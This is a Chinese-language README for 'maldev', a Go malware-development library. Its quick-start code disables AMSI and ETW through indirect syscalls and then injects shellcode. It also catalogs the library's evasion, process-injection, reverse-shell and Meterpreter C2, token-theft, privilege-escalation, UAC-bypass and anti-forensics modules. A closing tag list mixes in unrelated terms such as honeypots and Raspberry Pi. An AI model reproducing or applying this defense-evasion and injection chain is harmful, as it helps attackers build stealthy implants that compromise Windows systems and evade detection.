oioio-space/maldev

# maldev 用于攻防安全研究的模块化 Go 恶意软件开发库。 [](https://pkg.go.dev/github.com/oioio-space/maldev) ## 安装 ``` go get github.com/oioio-space/maldev@latest ``` ## 快速开始 ``` import ( "github.com/oioio-space/maldev/evasion" "github.com/oioio-space/maldev/evasion/amsi" "github.com/oioio-space/maldev/evasion/etw" "github.com/oioio-space/maldev/inject" wsyscall "github.com/oioio-space/maldev/win/syscall" ) // 1. Create a Caller for stealthy syscalls caller := wsyscall.New(wsyscall.MethodIndirect, wsyscall.Chain(wsyscall.NewHashGate(), wsyscall.NewHellsGate())) // 2. Disable defenses evasion.ApplyAll([]evasion.Technique{ amsi.ScanBufferPatch(), etw.All(), }, caller) // 3. Inject shellcode injector, _ := inject.NewWindowsInjector(&inject.WindowsConfig{ Config: inject.Config{Method: inject.MethodCreateThread}, SyscallMethod: wsyscall.MethodIndirect, }) injector.Inject(shellcode) ``` ## 文档 ### 📖 指南 | 指南 | 描述 | |-------|-------------| | **[入门指南](docs/getting-started.md)** | 第一步 —— 概念、术语、你的第一个 implant | | **[架构](docs/architecture.md)** | 分层设计、依赖流、Mermaid 图表 | | **[OPSEC 构建流水线](docs/opsec-build.md)** | garble, pe/strip, CallByHash —— 面向行动的构建 | | **[MITRE ATT&CK + D3FEND](docs/mitre.md)** | 包含防御对抗措施的完整技术映射 | ### 🔧 技术参考 每项技术都有一个专门的页面，包含初学者解释、技术细节、图表、使用示例以及与其他工具的对比。 | 类别 | 技术 | |----------|-----------| | **[注入](docs/techniques/injection/README.md)** | [CreateRemoteThread](docs/techniques/injection/create-remote-thread.md) · [Early Bird APC](docs/techniques/injection/early-bird-apc.md) · [线程劫持](docs/techniques/injection/thread-hijack.md) · [模块覆盖](docs/techniques/injection/module-stomping.md) · [节映射](docs/techniques/injection/section-mapping.md) · [回调执行](docs/techniques/injection/callback-execution.md) · [线程池](docs/techniques/injection/thread-pool.md) · [KernelCallbackTable](docs/techniques/injection/kernel-callback-table.md) · [Phantom DLL](docs/techniques/injection/phantom-dll.md) · [参数欺骗](docs/techniques/injection/process-arg-spoofing.md) | | **[规避](docs/techniques/evasion/README.md)** | [AMSI 绕过](docs/techniques/evasion/amsi-bypass.md) · [ETW 补丁](docs/techniques/evasion/etw-patching.md) · [ntdll 脱钩](docs/techniques/evasion/ntdll-unhooking.md) · [休眠掩码](docs/techniques/evasion/sleep-mask.md) · [硬件断点](docs/techniques/evasion/hw-breakpoints.md) · [ACG + BlockDLLs](docs/techniques/evasion/acg-blockdlls.md) · [反分析](docs/techniques/evasion/anti-analysis.md) | | **[系统调用](docs/techniques/syscalls/README.md)** | [直接与间接](docs/techniques/syscalls/direct-indirect.md) · [API 哈希](docs/techniques/syscalls/api-hashing.md) · [SSN 解析器](docs/techniques/syscalls/ssn-resolvers.md) | | **[C2 与传输](docs/techniques/c2/README.md)** | [反向 Shell](docs/techniques/c2/reverse-shell.md) · [Meterpreter](docs/techniques/c2/meterpreter.md) · [传输](docs/techniques/c2/transport.md) · [可塑性 HTTP](docs/techniques/c2/malleable-profiles.md) | | **[PE 操作](docs/techniques/pe/README.md)** | [剥离与清理](docs/techniques/pe/strip-sanitize.md) · [BOF 加载器](docs/techniques/pe/bof-loader.md) · [变形](docs/techniques/pe/morph.md) | | **[清理](docs/techniques/cleanup/README.md)** | [自删除](docs/techniques/cleanup/self-delete.md) · [时间戳篡改](docs/techniques/cleanup/timestomp.md) · [内存擦除](docs/techniques/cleanup/memory-wipe.md) | | **[令牌与权限](docs/techniques/tokens/README.md)** | [令牌窃取](docs/techniques/tokens/token-theft.md) ·[模拟](docs/techniques/tokens/impersonation.md) · [权限提升](docs/techniques/tokens/privilege-escalation.md) | | **[加密与编码](docs/techniques/crypto/README.md)** | [载荷加密](docs/techniques/crypto/payload-encryption.md) | ### 🧪 组合示例 | 示例 | 演示内容 | |---------|---------------------| | **[基础 Implant](docs/examples/basic-implant.md)** | 规避 → 解密 → 注入 → 休眠掩码 | | **[规避式注入](docs/examples/evasive-injection.md)** | 硬件断点 → 节映射 vs 模块覆盖 vs 回调 | | **[完整攻击链](docs/examples/full-chain.md)** | 侦察 → 规避 → 注入 → C2 → 后渗透 → 清理 | ### 📚 API 参考 各包的详细 API 文档（函数签名、参数、返回值）： | 领域 | 文档 | |--------|------| | Evasion API | [docs/evasion.md](docs/evasion.md) | | Injection API | [docs/injection.md](docs/injection.md) | | Syscall API | [docs/syscalls.md](docs/syscalls.md) | | C2 API | [docs/c2.md](docs/c2.md) | | Windows 原语 | [docs/win.md](docs/win.md) | | PE 操作 | [docs/pe.md](docs/pe.md) | | 加密与编码 | [docs/crypto.md](docs/crypto.md) | | Cleanup API | [docs/cleanup.md](docs/cleanup.md) | | 系统信息 | [docs/system.md](docs/system.md) | | 权限与利用 | [docs/privilege.md](docs/privilege.md) | | 进程管理 | [docs/process.md](docs/process.md) | ## 构建 ``` make build # standard development build make release # OPSEC build (garble + strip + trimpath) make debug # debug build (with logging) make test # run all tests make verify # build + test + cross-compile ``` **要求：** Go 1.21+ · 不需要 Windows SDK 头文件 · CGO 可选 ## 项目结构 ``` maldev/ ├── crypto/ encode/ hash/ random/ useragent/ ├── win/api/ win/syscall/ win/ntapi/ win/token/ win/privilege/ ├── evasion/amsi/ evasion/etw/ evasion/unhook/ evasion/sleepmask/ evasion/hwbp/ ├── inject/ process/enum/ pe/strip/ pe/bof/ pe/morph/ ├── c2/shell/ c2/transport/ c2/meterpreter/ c2/cert/ ├── cleanup/memory/ cleanup/selfdelete/ cleanup/timestomp/ cleanup/wipe/ ├── uacbypass/ exploit/cve202430088/ system/drive/ system/folder/ ├── internal/log/ internal/compat/ testutil/ cmd/rshell/ └── docs/ .claude/skills/ Makefile ``` ## 致谢 灵感来源于 [@D3Ext](https://github.com/D3Ext) 的 [D3Ext/maldev](https://github.com/D3Ext/maldev) 并与之进行了对比。部分改进参考了其实现模式。 ## 许可证 仅限授权的安全研究、红队行动和渗透测试使用。

标签：AMSI绕过, ATT&CK映射, C2通信, Chrome扩展, Conpot, DNS 反向解析, EDR绕过, ETW绕过, EVTX分析, Go语言, Hell's Gate, Hpfeeds, Process Herpaderping, Raspberry Pi, Shellcode注入, SSH蜜罐, T-Pot, unhook, Windows安全, YAML, 中高交互蜜罐, 内存执行, 威胁检测, 安全库, 恶意软件开发, 攻击模拟, 日志审计, 私有化部署, 程序破解, 端点可见性, 系统调用, 进程注入, 进程置换, 速率限制处理, 邮件钓鱼, 间接系统调用, 防御规避, 驱动签名利用, 高交互蜜罐